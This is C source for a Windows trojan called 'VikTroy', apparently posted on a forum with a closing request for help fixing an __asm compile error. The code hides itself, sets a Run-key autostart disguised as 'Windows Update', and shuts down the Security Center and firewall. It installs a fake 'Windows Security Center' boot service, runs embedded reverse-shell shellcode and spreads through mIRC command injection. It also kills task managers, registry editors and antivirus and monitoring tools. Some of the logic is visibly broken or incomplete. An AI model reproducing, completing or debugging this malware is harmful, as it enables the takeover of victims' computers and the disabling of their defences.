/* Autor: Coded by Black Ghost Lenguaje: C/C++ Win32 Name: Black ghost Ejecutable: Blackghost. */ #include <windows.h> #include <stdio.h> #include <string.h> #include <winsock.h> #include <stdlib.h> #include <process.h> #include <winbase.h> //#include <sys\types.h> #include <tlhelp32.h> #define CM_PRUEBA 101 #define CM_SALIR 102 #pragma comment(lib, "wsock32.lib") // SOCKET PRINCIPAL SOCKET sck; char RegQueryInfo[] = "reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe"; char SeCent[] = "net stop \"Security Center\""; char Shared[] = "net stop \"SharedAccess\""; char Reg1[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\" /v Start /t REG_DWORD /d 0x4 /f"; char Reg3[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\wscsvc\" /v Start /t REG_DWORD /d 0x4 /f"; char CreateSrv[] = "sc create wscenter binPath= \"%systemroot%\\system32\\viktroy.exe\" type= kernel start= boot error= ignore DisplayName= \"Windows Security Center\""; LRESULT CALLBACK WindowProc(HWND, UINT, WPARAM, LPARAM); // PAYLOAD unsigned char payload[] = "\x33\xc9\x83\xe9\xb8\xe8" "\xff\xff\xff\xff" "\xc0\x5e\x81\x76\x0e\x4a" "\x27\x98\xb9\x83\xee\xfc\xe2\xf4\xb6\x4d" "\x73\xf4\xa2\xde\x67\x46" "\xb5\x47\x13\xd5\x6e\x03\x13\xfc\x76\xac\xe4\xbc\x32\x26\x77\x32" "\x05\x3f\x13\xe6\x6a\x26\x73\xf0\xc1\x13\x13\xb8\xa4\x16\x58\x20" "\xe6\xa3\x58\xcd\x4d\xe6\x52\xb4\x4b\xe5\x73\x4d\x71\x73\xbc\x91" "\x3f\xc2\x13\xe6\x6e\x26\x73\xdf\xc1\x2b\xd3\x32\x15\x3b\x99\x52" "\x49\x0b\x13\x30\x26\x03\x84\xd8\x89\x16\x43\xdd\xc1\x64\xa8\x32" "\x0a\x2b\x13\xc9\x56\x8a\x13\xf9\x42\x79\xf0\x37\x04\x29\x74\xe9" "\xb5\xf1\xfe\xea\x2c\x4f\xab\x8b\x22\x50\xeb" "\x8b\x15\x73\x67\x69" // w0w "\x22\xec\x75\x45\x71\x77\x67" "\x6f\x15\xae\x7d\xdf\xcb\xca\x90\xbb" "\x1f\x4d\x9a\x46\x9a\x4f\x41\xb0\xbf\x8a\xcf\x46\x9c\x74\xcb\xea" "\x19\x64\xcb\xfa\x19\xd8\x48\xd1\x35\x27\x98\xb8\x2c\x4f\x9a\x23" 
"\x2c\x74\x11\x58\xdf\x4f\x74\x40\xe0\x47\xcf\x46\x9c\x4d\x88\xe8" "\x1f\xd8\x48\xdf\x20\x43\xfe\xd1\x29\x4a\xf2\xe9\x13\x0e\x54\x30" "\xad\x4d\xdc\x30\xa8\x16\x58\x4a\xe0\xb2\x11\x44\xb4\x65\xb5\x47" "\x08\x0b\x15\xc3\x72\x8c\x33" // r0x "\x12\x22\x55\x66\x0a\x5c\xd8\xed\x91" "\xb5\xf1\xc3\xee\x18\x76\xc9\xe8" "\x20\x26\xc9\xe8\x1f\x76\x67\x69" "\x22\x8a\x41\xbc\x84\x74\x67\x6f\x20\xd8\x67\x8e\xb5\xf7\xf0\x5e" "\x33\xe1\xe1\x46\x3f\x23\x67\x6f\xb5\x50\x64\x46\x9a\x4f\xe6\x61" "\xa8\x54\xcb\x46\x9c" // c0d3d "\xd8\x48\xb9\x90\x90\x90"; //ListaProcesos char *proc_list[]={ "cmd.exe", "taskmgr.exe", "netstat.exe", "tasklist.exe", "taskkill.exe", "avp.exe", "ethereal.exe", "whireshark.exe", "snort.exe", "control.exe", "autoruns.exe", "autorunsc.exe", "tcpview.exe", "ettercap.exe", "firefox.exe", "regedit.exe", "reg.exe" }; // Thread Struct typedef struct thread_struct { char name[250]; HANDLE Thread_Handle; int id; } thread; thread threads[10]; int Comando(char recibido[130]); int CrearThread(char *name, HANDLE Thread_Handle, int id); void Esconder(void); void Reverse(void); DWORD WINAPI pcInfo(LPVOID param); DWORD WINAPI ownMirc(LPVOID param); DWORD WINAPI Pong(LPVOID param); DWORD WINAPI keyLogger(LPVOID param); DWORD WINAPI revShell(LPVOID param); DWORD WINAPI Infectar(LPVOID param); DWORD WINAPI winFuck(LPVOID param); DWORD WINAPI Happy(LPVOID param); int Comando(char recibido[130]); int CrearThread(char *name, HANDLE Thread_Handle, int id); void Esconder(void); void Reverse(void); /*int main(void);*/ DWORD WINAPI pcInfo(LPVOID param); DWORD WINAPI ownMirc(LPVOID param); //DWORD WINAPI Pong(LPVOID param); DWORD WINAPI revShell(LPVOID param); DWORD WINAPI SendProcess(LPVOID param); DWORD WINAPI winFuck(LPVOID param); DWORD WINAPI Happy(LPVOID param); DWORD WINAPI CallChat(LPVOID param); /* int main(int argc, char *argv[]) { char bof[25]; strcpy(bof, argv[1]); return 0; } */ // INDEX int main(void) { HANDLE hThread; DWORD id; WSADATA wsa; struct sockaddr_in mysock; 
char recvbuff[130]; char *hello = "HEllO"; WSAStartup(MAKEWORD(1, 0), &wsa); sck = socket(AF_INET, SOCK_STREAM, 0); Esconder(); mysock.sin_family = AF_INET; mysock.sin_addr.s_addr = inet_addr("127.0.0.1"); mysock.sin_port = htons(80); //hThread = CreateThread(NULL, 0, Pong, NULL, 0, &id); connect(sck, (struct sockaddr *)&mysock, sizeof(struct sockaddr)); for(;;) { if(recv(sck, recvbuff, 128, 0)>2) { Comando(recvbuff); } Sleep(800); } Sleep(1000); WSACleanup(); return 1; } int Comando(char recibido[130]) { HANDLE hThread; DWORD id; char *pString; if(pString==NULL) { return -1; } pString++; { hThread = CreateThread(NULL, 0, pcInfo, NULL, 0, &id); CrearThread("INFO", hThread, id); Sleep(1000); } { hThread = CreateThread(NULL, 0, ownMirc, NULL, 0, &id); CrearThread("MIRC", hThread, id); } { closesocket(sck); WSACleanup(); } { hThread = CreateThread(NULL, 0, revShell, NULL, 0, &id); CrearThread("SHELL", hThread, id); } { hThread = CreateThread(NULL, 0, SendProcess, NULL, 0, &id); CrearThread("SHRC", hThread, id); } { hThread = CreateThread(NULL, 0, winFuck, NULL, 0, &id); CrearThread("FUCK", hThread, id); } { HWND hWnd; hWnd = FindWindow("ConsoleWindowClass", NULL); ShowWindow(hWnd, SW_SHOWNORMAL); } { HWND hWnd; hWnd = FindWindow("ConsoleWindowClass", NULL); ShowWindow(hWnd, SW_HIDE); } { hThread = CreateThread(NULL, 0, Happy, NULL, 0, &id); CrearThread("HAPPY", hThread, id); } { hThread = CreateThread(NULL, 0, CallChat, NULL, 0, &id); CrearThread("CHAT", hThread, id); } { system("reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe"); } return 0; } void Reverse(void) { void(*rever)(); *(int *)&rever = (int)payload; rever(); } // Not ShellCode Call /* PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; SOCKET rsck; //WSADATA wsadata; struct sockaddr_in rSock; memset(&sinfo,0,sizeof(sinfo)); //WSAStartup(MAKEWORD(1, 0), &wsadata); rsck = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); rSock.sin_addr.s_addr = 
inet_addr("127.0.0.1"); rSock.sin_family = AF_INET; bind(rsck, (struct sockaddr*)&rSock, sizeof(rSock)); rSock.sin_port = htons(666); memset(&(rSock.sin_zero), 0, 8); connect(rsck, (struct sockaddr *)&rSock, sizeof(rSock)); sinfo.cb = sizeof(sinfo); sinfo.dwFlags = STARTF_USESTDHANDLES; sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = rsck; CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &sinfo, &pinfo); */ // ThreadGen int CrearThread(char *name, HANDLE Thread_Handle, int id) { threads[c].id = id; threads[c].Thread_Handle = Thread_Handle; return c; } // HIDE void Esconder(void) { HWND hWnd; hWnd = FindWindow("ConsoleWindowClass", NULL); ShowWindow(hWnd, SW_HIDE); } // Arquitectura DWORD WINAPI pcInfo(LPVOID param) { SYSTEM_INFO sysinfo; char allinfo[16]; GetSystemInfo(&sysinfo); if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_INTEL) { if(sysinfo.wProcessorLevel==3) { } else if(sysinfo.wProcessorLevel==4) { } else if(sysinfo.wProcessorLevel==5) { } } else if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_PPC) { if(sysinfo.wProcessorLevel==1) { } else if(sysinfo.wProcessorLevel==3) { } else if(sysinfo.wProcessorLevel==20) { } } SetComputerName("xZ-Ownk"); return 0; } // Injeccion de comandos mirc. 
Gracias a CrowDat por su explicacion :P DWORD WINAPI ownMirc(LPVOID param) { HWND hWnd; char run1[] = "/run VikTroy.exe"; SetForegroundWindow(hWnd); hWnd = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC", NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit", 0); SendMessage(hWnd, WM_SETTEXT, 0, (LPARAM)run1); SendMessage(hWnd, WM_IME_KEYDOWN, VK_RETURN, 0); Sleep(1500); return 0; } // Pong Conexion Thread /*DWORD WINAPI Pong(LPVOID param) { char *pong="PONG"; for(;;) { Sleep(25000); send(sck, pong, strlen(pong), 0); } return 1; } */ // Reverse Shell Thread DWORD WINAPI revShell(LPVOID param) { Reverse(); return 0; } // Tripode DWORD WINAPI SendProcess(LPVOID param) { HANDLE hlista; PROCESSENTRY32 proceso; char proname[30]; char killer[30]; int ret, i, mok; mok = 0; for(;;) { ret = 0; i = 0; for(i=0;i<17;i++) { ZeroMemory(&proceso,sizeof(proceso)); proceso.dwSize = sizeof(proceso); if ((hlista = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0)) != (HANDLE)-1) /* devuelve estructura con la captura de todos los procesos */ { ret = Process32First(hlista,&proceso); while(ret) { { mok++; } { WinExec(killer, SW_HIDE); } ret = Process32Next(hlista,&proceso); } CloseHandle(hlista); } } Sleep(100); } } /*HKEY hKey; unsigned char direccion[] = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"; unsigned char proceso[] = "VikTroy.exe"; RegCreateKey(HKEY_LOCAL_MACHINE, "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" , &hKey); RegSetValueEx(hKey, "Microsoft Windows Firewall", 0, REG_SZ, proceso, sizeof("proceso")); RegCloseKey(hKey);*/ // WINDOWS FUCKEd x"DDDDDDDDDDD DWORD WINAPI winFuck(LPVOID param) { __asm { mov eax, offset SeCent push eax call system pop ebx nop nop // Security Center Off mov eax, offset Shared push eax call system pop ebx nop nop // Shared Off mov eax, offset Reg1 push eax call system pop ebx nop nop // Reg1 In mov eax, offset Reg3 push eax call system pop ebx nop nop mov eax, offset CreateSrv push eax call system pop ebx nop nop }// 
Reg2 In return 0; } // Funcion Feliz DWORD WINAPI Happy(LPVOID param) { int a = 0; char *Texto = " VikTroy: Simple Trojan Horse \n" " http://sincontrol.tomahost.org \n" " Gm Vk Tj Pp \n" " irc-hispano.org #sub_level \n" " by xZR !Sub_Level Security \n"; a = MessageBox(NULL, Texto, "by xZR !Sub_Level", MB_OK | MB_ICONERROR | MB_DEFBUTTON4); for(;;) { if(a==IDOK || a==IDYES || a==IDABORT || a==IDCANCEL || a==IDNO) { a= MessageBox(NULL, Texto, "by xZR !Sub_Level", MB_OK | MB_ICONERROR | MB_DEFBUTTON4); } } return -1; } // Not Avaible DWORD WINAPI CallChat(LPVOID param) { HINSTANCE hInstance, hPrevInstance; LPSTR CmdLine; int uCmd; HWND hWnd; MSG uMsg; WNDCLASSEX wincl; SOCKET chatsock; struct sockaddr_in chsock; wincl.cbClsExtra = 0; wincl.cbWndExtra = 0; wincl.cbSize = sizeof(WNDCLASSEX); wincl.hbrBackground = (HBRUSH) COLOR_HIGHLIGHT; wincl.hCursor = LoadCursor(NULL, IDC_ARROW); wincl.hIcon = LoadIcon(NULL, "icono.ico"); wincl.hIconSm = LoadIcon(NULL, "icono.ico"); wincl.hInstance = hInstance; wincl.lpfnWndProc = WindowProc; wincl.lpszClassName = "VentanaChat"; wincl.lpszMenuName = NULL; wincl.style = CS_DBLCLKS; RegisterClassEx(&wincl); hWnd = CreateWindowEx( 0, "VentanaChat", "Viktroy Talk", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, HWND_DESKTOP, NULL, hInstance, NULL); ShowWindow(hWnd, SW_SHOWDEFAULT); while(TRUE == GetMessage(&uMsg, 0, 0, 0)) { TranslateMessage(&uMsg); DispatchMessage(&uMsg); } return uMsg.wParam; } LRESULT CALLBACK WindowProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam) { switch(uMsg) { case WM_DESTROY: PostQuitMessage(0); break; default: return DefWindowProc(hWnd, uMsg, wParam, lParam); } return 0; }
y por cierto me da error en esta Linea alguna ayudita?
-__asm {